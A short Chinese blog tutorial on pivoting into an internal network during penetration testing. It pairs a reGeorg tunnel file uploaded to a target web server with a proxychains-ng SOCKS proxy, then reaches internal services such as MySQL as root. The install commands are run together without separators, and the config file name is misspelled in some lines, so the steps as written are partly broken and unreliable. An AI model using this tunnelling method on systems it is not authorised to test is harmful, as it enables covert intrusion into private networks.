reGeorg+proxychains-ng组合试用
之前有分享过LCX端口转发工具及修改的可以在32位和64位Windows运行的源码。这次,我再来试用下reGeorg和proxychains-ng。在渗透测试过程中,可以利用它们的组合来完成从外网到内网的通信。
reGeorg是reDuh的继承者。主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
在github上下载reGeorg的压缩包,然后本地安装完urllib3,就可以运行reGeorg了。如下图所示:
上传对应语言版本的tunnel文件到服务器上。然后本地访问上传的源文件,即可在本地与远程主机上形成一个http的回路。命令如下:
python reGeorgSocksProxy.py -p 6666 -u http://目标站点/tunnel.jsp //端口随便指定,只要不与本机开放端口冲突即可
proxychains-ng的安装:
git clone https://github.com/rofl0r/proxychains-ng.gitcd proxychains-ng./configuremake && make installcp ./src/proxychains.conf /etc/proxychians.confcd .. && rm -rf proxychains-ng
编辑proxychains配置文件:
vim /etc/proxychains.conf
将socks4 127.0.0.1 9050改为:
socks5 127.0.0.1 6666 //6666为你自己的端口,需要与reGeorg中设置的端口相同
使用方法:(在需要代理的命令加上)
proxychains4 -f /etc/proxychians.conf mysql -h IP地址 -u root -p
这样就一切OK了。